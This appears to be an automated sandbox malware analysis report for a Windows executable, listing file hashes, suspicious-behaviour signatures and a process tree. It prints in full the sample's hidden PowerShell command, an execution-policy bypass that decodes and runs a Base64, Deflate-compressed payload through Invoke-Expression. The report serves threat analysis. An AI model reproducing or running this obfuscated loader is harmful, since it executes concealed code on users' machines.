c4f3a6c4039728a88e7886e48aef0e59751ff9cf951f10a895dc684a74bf88ea

Analysis

max time kernel
120s
max time network
125s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
13/03/2024, 13:17

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

c5f8030f38b13d4b8777063baa459784.exe
Size

92KB
MD5

c5f8030f38b13d4b8777063baa459784
SHA1

8ae9ce023503e37f0686723e8979ddb70db03cad
SHA256

c4f3a6c4039728a88e7886e48aef0e59751ff9cf951f10a895dc684a74bf88ea
SHA512

8bd80f03463464a52bfa3f04e79ce2d2d4d4c7e1c1c9b4a49b954c6690db7a46f0dc39ba46f1a6166c3ce7a9ccb64f8f6038e229058e50efec2d50ac0f0311f7
SSDEEP

1536:U07ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIflwHXXOf:UKFfHgTWmCRkGbKGLeNTBflUc

Score

1^/10

Malware Config

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2200	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2200	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2200	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 2104	1732	c5f8030f38b13d4b8777063baa459784.exe	29
PID 1732 wrote to memory of 2104	1732	c5f8030f38b13d4b8777063baa459784.exe	29
PID 1732 wrote to memory of 2104	1732	c5f8030f38b13d4b8777063baa459784.exe	29
PID 1732 wrote to memory of 2104	1732	c5f8030f38b13d4b8777063baa459784.exe	29
PID 2104 wrote to memory of 2200	2104	cmd.exe	30
PID 2104 wrote to memory of 2200	2104	cmd.exe	30
PID 2104 wrote to memory of 2200	2104	cmd.exe	30
PID 2104 wrote to memory of 2200	2104	cmd.exe	30

C:\Users\Admin\AppData\Local\Temp\c5f8030f38b13d4b8777063baa459784.exe
"C:\Users\Admin\AppData\Local\Temp\c5f8030f38b13d4b8777063baa459784.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4846.tmp\4847.tmp\4848.bat C:\Users\Admin\AppData\Local\Temp\c5f8030f38b13d4b8777063baa459784.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2104
- - C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
    C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -Noninteractive -W Hidden -WindowsStyle Hidden -Mta -Exec Bypass -Command -Help -? "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZtb9pIEP4c/4qVZal2Y1uGkDYNQmrSNLmoDYcKzZ1qoZOxF9iy3nV31waS8t9vFpsX07SK+uF0QmjH62dePPPszlgx6qC3phFeUXqbZlwo25xhwTA9afoJpaYzRFk+oiRGUkUKFrxQ8B7dMtVTAt0TofKIXlDKY7vam7soJ0yhRbUuq/XBaf+2n3cCRwoPprAkGz95Zbdw0c5zJe35rna0d/OtYaX3d/j2fb8H393Fc+/P0VccK9RfSoVT/x2nFB4JZ9K/ECJafiRSGVaPzujnb3g6iPuXD6BoFqkURWy6yFRxVhA81+KcCCynkZiZrlkQCWlBo0iSNWxMkoRiocUinUcCr6URX+g1EzzGUsInZ5SLEhXlihO1QSkIpdRVnFNZiiKaJ3JWyrkcpTyXpdm0kBVExpKU0oJhVUn/yGISlXKK01hRLSfjU4lFsXGoZRJX5qaTsTQNaybvbtjF3T3uir8HkIUbrLxeGbpxzcX7KJ4i26KfMvoV924KRBiq6zjo0TjaIWP+9UPvy+TiSxb1S3Qtz2v0ERnv2/Qrf90oxeg76mNdLa+vBGETVDdYqpf625p7Xa7ecaYiwiR62myldxQWnCTDrap/kSQ/CcTR+JWx/q+MlVFz6cc8Bx56+BsKtOnwcqlwOBxa3UFvICImU6I6buNl66y9vxUGw06waFy2t3iJY86SQ5X67lbLYvwi1vF1rHFEJW4PxPLR6vN4hlVnj/ZdrPxyV1arHe7vwUcDp+V1lBK6HJ6fw1nCAgBzLmZu+KP2YJlhgF1NRJTW30O+FI85rRCfk8xpVwHBqWMMorFf5NLPgN8+U5nPxeSF22ieOO3wfl2JCtzHDAqxl6pDwCccY1LgOmYVRyqePu7lRYkcr9qWyNmAq4h2gnbFTNu6ZQlerAm5X5FW4Putk6HzuNPZSi+bp6+OSz2wOSZCqgFJccfey/WVvsBg0268CQK3Ab9g/Qs3Lz4QlujUqNhxdObvCKWkLLC0w8+Q+1etob3z2QiCAJD9NaLdV5GAo0AxzpAnUTMoaw4B6Lz8j4peRfTMqm/QZdnrdP8BtC39IW7nlHKJ7d+lw8Fpey4j1jfCf0cF5KEdBZE3wUAG5HGBtp+rLyKl2SGf7II/lhjZ4RPvfkkU9JRGjTBwbWNgzJPAA+YM4swxLLnjTON102+89hv+mxcuOgvO4G79jniuPJZT2kZWBh8Wrjs4aJfDwy2DyYLF2DZHcKVCZ2s5AFwAEAxvmZMdGNLtPjCs5TPshZdEN5cCC0iDDppDQk6aYNMNnONT7W0JN7Q2uLi8NuZTQjF0igfkUfVrZaiXjuS4HurStR6OT4E8P8/0NY0mEqx1OYPGtjLGwALbIp0GxELAL0YtLR0fgwcIziI6uo25g4ig3eteBPyDwQr6kf9HxGCmcUDLawxXhqVAFyjh6ZohD0aLERZXeEwY0QMVtGdov7pvm38RdtI0kcfgSWZRjNF65zpn5eiFvCySUk1FrgsEZ/P8vDZnBq619D9iNlFTN1icAPdhaQWOsYn8E7Rc4L6/JiTP+uUwI/27SMCARnUJebbUGUQB1K2cEOE8LfxN2h3HRVsnQD21qXo1gurTai3KY1tnTO0erg7k2atWEFR3zkqPCP8C\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2200

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4846.tmp\4847.tmp\4848.bat

Filesize
4KB

MD5
2287a5af97f01bc267b02aebc899e897

SHA1
fbaf36bd3c285f63bd3b5b44e4b1b79d388b1d92

SHA256
74a48464d41cbc598d64fa7d71b7849634b6caef91d9f076f05a56d3ba176661

SHA512
41c5f30206abbf663d473393d7d1723874f3a56e82f936dce21a6a6a21953eb57d4af5dd51273629ed3b285d0e9fce11a4aba28d1f1388e8aa8959000ff516be

Download Submit
memory/2200-4-0x0000000074000000-0x00000000745AB000-memory.dmp

Filesize
5.7MB

Download
memory/2200-5-0x0000000074000000-0x00000000745AB000-memory.dmp

Filesize
5.7MB

Download
memory/2200-6-0x0000000002430000-0x0000000002470000-memory.dmp

Filesize
256KB

Download
memory/2200-7-0x0000000002430000-0x0000000002470000-memory.dmp

Filesize
256KB

Download
memory/2200-8-0x0000000074000000-0x00000000745AB000-memory.dmp

Filesize
5.7MB

Download
memory/2200-9-0x0000000074000000-0x00000000745AB000-memory.dmp

Filesize
5.7MB

Download
memory/2200-10-0x0000000074000000-0x00000000745AB000-memory.dmp

Filesize
5.7MB

Download